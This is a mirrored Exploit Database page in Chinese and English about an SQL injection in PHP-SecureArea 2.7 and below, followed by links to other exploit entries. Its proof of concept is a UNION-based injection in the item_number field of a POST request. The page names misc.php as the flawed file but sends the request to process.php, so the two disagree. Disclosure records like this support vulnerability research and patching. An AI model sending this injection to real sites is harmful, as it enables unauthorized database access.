PHP-SecureArea < 2.7 - Multiple Vulnerabilities

Exploit Database
16 阅读

作者： Cryo

日期： 2017-08-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/42595/

# Exploit Title: PHP-SecureArea <= v2.7 - SQL Injection
# Date: 30-08-2017
# Exploit Author: Cryo
# Contact: https://twitter.com/KernelEquinox
# Vendor Homepage: https://www.withinweb.com
# Software Link: https://www.withinweb.com/phpsecurearea/
# Version: 2.7 and below
# Tested on: Windows, Linux, Mac OS X

1. Description
==============

PHP-SecureArea is vulnerable to SQL injection due to lack of input sanitization in the misc.php file.


2. Proof of Concept
===================

POST /phpsecurearea/ipn/process.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

item_number=-1' UNION ALL SELECT 1-- -

last Exploits
PHP-SecureArea < 2.7 - Multiple Vulnerabilities的更多信息

WordPress Plugin Instagram Feed 1.4.6.2 – Cross-Site Request Forgery：
D-Link DAP-1325 – Broken Access Control：
phpList 2.10.9 – ‘Sajax.php’ PHP Code Injection：
PBBoard CMS – Persistent Cross-Site Scripting：
WDTV Live SMP 2.03.20 – Remote Password Reset：
phpMyAdmin 4.7.x – Cross-Site Request Forgery：
AdaptCMS 2.0 – SQL Injection：
Readymade PHP Classified Script 3.3 – ‘subctid’ / ‘mctid’ SQL Injection：